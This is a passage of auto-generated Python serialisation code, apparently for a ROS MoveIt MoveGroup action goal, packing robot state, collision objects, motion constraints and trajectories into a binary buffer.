def serialize_numpy(self, buff, numpy): try: _x = self buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_2I().pack(_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs)) _x = self.goal_id.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_3I().pack(_x.goal.request.workspace_parameters.header.seq, _x.goal.request.workspace_parameters.header.stamp.secs, _x.goal.request.workspace_parameters.header.stamp.nsecs)) _x = self.goal.request.workspace_parameters.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_6d3I().pack(_x.goal.request.workspace_parameters.min_corner.x, _x.goal.request.workspace_parameters.min_corner.y, _x.goal.request.workspace_parameters.min_corner.z, _x.goal.request.workspace_parameters.max_corner.x, _x.goal.request.workspace_parameters.max_corner.y, _x.goal.request.workspace_parameters.max_corner.z, _x.goal.request.start_state.joint_state.header.seq, _x.goal.request.start_state.joint_state.header.stamp.secs, _x.goal.request.start_state.joint_state.header.stamp.nsecs)) _x = self.goal.request.start_state.joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.start_state.joint_state.name) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.joint_state.name: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.request.start_state.joint_state.position) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.request.start_state.joint_state.position.tostring()) length = len(self.goal.request.start_state.joint_state.velocity) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.request.start_state.joint_state.velocity.tostring()) length = len(self.goal.request.start_state.joint_state.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.request.start_state.joint_state.effort.tostring()) _x = self buff.write(_get_struct_3I().pack(_x.goal.request.start_state.multi_dof_joint_state.header.seq, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.secs, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.nsecs)) _x = self.goal.request.start_state.multi_dof_joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.start_state.multi_dof_joint_state.joint_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.joint_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.request.start_state.multi_dof_joint_state.transforms) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.transforms: _v297 = val1.translation _x = _v297 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v298 = val1.rotation _x = _v298 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.request.start_state.multi_dof_joint_state.twist) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.twist: _v299 = val1.linear _x = _v299 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v300 = val1.angular _x = _v300 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.request.start_state.multi_dof_joint_state.wrench) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.wrench: _v301 = val1.force _x = _v301 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v302 = val1.torque _x = _v302 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.request.start_state.attached_collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.attached_collision_objects: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v303 = val1.object _v304 = _v303.header buff.write(_get_struct_I().pack(_v304.seq)) _v305 = _v304.stamp _x = _v305 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v304.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v303.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v306 = _v303.type _x = _v306.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v306.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v303.primitives) buff.write(_struct_I.pack(length)) for val3 in _v303.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.dimensions.tostring()) length = len(_v303.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v303.primitive_poses: _v307 = val3.position _x = _v307 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v308 = val3.orientation _x = _v308 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v303.meshes) buff.write(_struct_I.pack(length)) for val3 in _v303.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(val4.vertex_indices.tostring()) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v303.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v303.mesh_poses: _v309 = val3.position _x = _v309 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v310 = val3.orientation _x = _v310 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v303.planes) buff.write(_struct_I.pack(length)) for val3 in _v303.planes: buff.write(val3.coef.tostring()) length = len(_v303.plane_poses) buff.write(_struct_I.pack(length)) for val3 in _v303.plane_poses: _v311 = val3.position _x = _v311 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v312 = val3.orientation _x = _v312 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v303.subframe_names) buff.write(_struct_I.pack(length)) for val3 in _v303.subframe_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v303.subframe_poses) buff.write(_struct_I.pack(length)) for val3 in _v303.subframe_poses: _v313 = val3.position _x = _v313 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v314 = val3.orientation _x = _v314 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(_v303.operation)) length = len(val1.touch_links) buff.write(_struct_I.pack(length)) for val2 in val1.touch_links: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) _v315 = val1.detach_posture _v316 = _v315.header buff.write(_get_struct_I().pack(_v316.seq)) _v317 = _v316.stamp _x = _v317 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v316.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v315.joint_names) buff.write(_struct_I.pack(length)) for val3 in _v315.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v315.points) buff.write(_struct_I.pack(length)) for val3 in _v315.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.positions.tostring()) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.velocities.tostring()) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.accelerations.tostring()) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.effort.tostring()) _v318 = val3.time_from_start _x = _v318 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) buff.write(_get_struct_d().pack(val1.weight)) buff.write(_get_struct_B().pack(self.goal.request.start_state.is_diff)) length = len(self.goal.request.goal_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.goal_constraints: _x = val1.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.joint_constraints: _x = val2.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(val1.position_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.position_constraints: _v319 = val2.header buff.write(_get_struct_I().pack(_v319.seq)) _v320 = _v319.stamp _x = _v320 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v319.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v321 = val2.target_point_offset _x = _v321 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v322 = val2.constraint_region length = len(_v322.primitives) buff.write(_struct_I.pack(length)) for val4 in _v322.primitives: buff.write(_get_struct_B().pack(val4.type)) length = len(val4.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val4.dimensions.tostring()) length = len(_v322.primitive_poses) buff.write(_struct_I.pack(length)) for val4 in _v322.primitive_poses: _v323 = val4.position _x = _v323 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v324 = val4.orientation _x = _v324 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v322.meshes) buff.write(_struct_I.pack(length)) for val4 in _v322.meshes: length = len(val4.triangles) buff.write(_struct_I.pack(length)) for val5 in val4.triangles: buff.write(val5.vertex_indices.tostring()) length = len(val4.vertices) buff.write(_struct_I.pack(length)) for val5 in val4.vertices: _x = val5 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v322.mesh_poses) buff.write(_struct_I.pack(length)) for val4 in _v322.mesh_poses: _v325 = val4.position _x = _v325 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v326 = val4.orientation _x = _v326 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val2.weight)) length = len(val1.orientation_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.orientation_constraints: _v327 = val2.header buff.write(_get_struct_I().pack(_v327.seq)) _v328 = _v327.stamp _x = _v328 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v327.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v329 = val2.orientation _x = _v329 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(val1.visibility_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.visibility_constraints: buff.write(_get_struct_d().pack(val2.target_radius)) _v330 = val2.target_pose _v331 = _v330.header buff.write(_get_struct_I().pack(_v331.seq)) _v332 = _v331.stamp _x = _v332 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v331.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v333 = _v330.pose _v334 = _v333.position _x = _v334 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v335 = _v333.orientation _x = _v335 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val2.cone_sides)) _v336 = val2.sensor_pose _v337 = _v336.header buff.write(_get_struct_I().pack(_v337.seq)) _v338 = _v337.stamp _x = _v338 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v337.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v339 = _v336.pose _v340 = _v339.position _x = _v340 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v341 = _v339.orientation _x = _v341 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) _x = self.goal.request.path_constraints.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.path_constraints.joint_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.joint_constraints: _x = val1.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(self.goal.request.path_constraints.position_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.position_constraints: _v342 = val1.header buff.write(_get_struct_I().pack(_v342.seq)) _v343 = _v342.stamp _x = _v343 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v342.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v344 = val1.target_point_offset _x = _v344 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v345 = val1.constraint_region length = len(_v345.primitives) buff.write(_struct_I.pack(length)) for val3 in _v345.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.dimensions.tostring()) length = len(_v345.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v345.primitive_poses: _v346 = val3.position _x = _v346 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v347 = val3.orientation _x = _v347 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v345.meshes) buff.write(_struct_I.pack(length)) for val3 in _v345.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(val4.vertex_indices.tostring()) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v345.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v345.mesh_poses: _v348 = val3.position _x = _v348 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v349 = val3.orientation _x = _v349 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val1.weight)) length = len(self.goal.request.path_constraints.orientation_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.orientation_constraints: _v350 = val1.header buff.write(_get_struct_I().pack(_v350.seq)) _v351 = _v350.stamp _x = _v351 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v350.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v352 = val1.orientation _x = _v352 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val1 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(self.goal.request.path_constraints.visibility_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.path_constraints.visibility_constraints: buff.write(_get_struct_d().pack(val1.target_radius)) _v353 = val1.target_pose _v354 = _v353.header buff.write(_get_struct_I().pack(_v354.seq)) _v355 = _v354.stamp _x = _v355 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v354.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v356 = _v353.pose _v357 = _v356.position _x = _v357 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v358 = _v356.orientation _x = _v358 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val1.cone_sides)) _v359 = val1.sensor_pose _v360 = _v359.header buff.write(_get_struct_I().pack(_v360.seq)) _v361 = _v360.stamp _x = _v361 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v360.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v362 = _v359.pose _v363 = _v362.position _x = _v363 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v364 = _v362.orientation _x = _v364 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val1 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) length = len(self.goal.request.trajectory_constraints.constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.trajectory_constraints.constraints: _x = val1.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.joint_constraints: _x = val2.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(val1.position_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.position_constraints: _v365 = val2.header buff.write(_get_struct_I().pack(_v365.seq)) _v366 = _v365.stamp _x = _v366 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v365.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v367 = val2.target_point_offset _x = _v367 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v368 = val2.constraint_region length = len(_v368.primitives) buff.write(_struct_I.pack(length)) for val4 in _v368.primitives: buff.write(_get_struct_B().pack(val4.type)) length = len(val4.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val4.dimensions.tostring()) length = len(_v368.primitive_poses) buff.write(_struct_I.pack(length)) for val4 in _v368.primitive_poses: _v369 = val4.position _x = _v369 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v370 = val4.orientation _x = _v370 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v368.meshes) buff.write(_struct_I.pack(length)) for val4 in _v368.meshes: length = len(val4.triangles) buff.write(_struct_I.pack(length)) for val5 in val4.triangles: buff.write(val5.vertex_indices.tostring()) length = len(val4.vertices) buff.write(_struct_I.pack(length)) for val5 in val4.vertices: _x = val5 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v368.mesh_poses) buff.write(_struct_I.pack(length)) for val4 in _v368.mesh_poses: _v371 = val4.position _x = _v371 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v372 = val4.orientation _x = _v372 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val2.weight)) length = len(val1.orientation_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.orientation_constraints: _v373 = val2.header buff.write(_get_struct_I().pack(_v373.seq)) _v374 = _v373.stamp _x = _v374 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v373.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v375 = val2.orientation _x = _v375 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(val1.visibility_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.visibility_constraints: buff.write(_get_struct_d().pack(val2.target_radius)) _v376 = val2.target_pose _v377 = _v376.header buff.write(_get_struct_I().pack(_v377.seq)) _v378 = _v377.stamp _x = _v378 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v377.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v379 = _v376.pose _v380 = _v379.position _x = _v380 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v381 = _v379.orientation _x = _v381 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val2.cone_sides)) _v382 = val2.sensor_pose _v383 = _v382.header buff.write(_get_struct_I().pack(_v383.seq)) _v384 = _v383.stamp _x = _v384 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v383.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v385 = _v382.pose _v386 = _v385.position _x = _v386 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v387 = _v385.orientation _x = _v387 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2 buff.write(_get_struct_2dBd().pack(_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight)) length = len(self.goal.request.reference_trajectories) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.reference_trajectories: _v388 = val1.header buff.write(_get_struct_I().pack(_v388.seq)) _v389 = _v388.stamp _x = _v389 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v388.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_trajectory) buff.write(_struct_I.pack(length)) for val2 in val1.joint_trajectory: _v390 = val2.header buff.write(_get_struct_I().pack(_v390.seq)) _v391 = _v390.stamp _x = _v391 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v390.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val2.joint_names) buff.write(_struct_I.pack(length)) for val3 in val2.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(val2.points) buff.write(_struct_I.pack(length)) for val3 in val2.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.positions.tostring()) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.velocities.tostring()) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.accelerations.tostring()) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.effort.tostring()) _v392 = val3.time_from_start _x = _v392 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) length = len(val1.cartesian_trajectory) buff.write(_struct_I.pack(length)) for val2 in val1.cartesian_trajectory: _v393 = val2.header buff.write(_get_struct_I().pack(_v393.seq)) _v394 = _v393.stamp _x = _v394 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v393.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.tracked_frame length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val2.points) buff.write(_struct_I.pack(length)) for val3 in val2.points: _v395 = val3.point _v396 = _v395.pose _v397 = _v396.position _x = _v397 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v398 = _v396.orientation _x = _v398 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _v399 = _v395.velocity _v400 = _v399.linear _x = _v400 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v401 = _v399.angular _x = _v401 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v402 = _v395.acceleration _v403 = _v402.linear _x = _v403 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v404 = _v402.angular _x = _v404 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v405 = val3.time_from_start _x = _v405 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) _x = self.goal.request.planner_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self.goal.request.group_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_i3d().pack(_x.goal.request.num_planning_attempts, _x.goal.request.allowed_planning_time, _x.goal.request.max_velocity_scaling_factor, _x.goal.request.max_acceleration_scaling_factor)) _x = self.goal.planning_options.planning_scene_diff.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name) buff.write(_struct_I.pack(length)) for val1 in self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position.tostring()) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity.tostring()) length = len(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort.tostring()) _x = self buff.write(_get_struct_3I().pack(_x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.nsecs)) _x = self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = 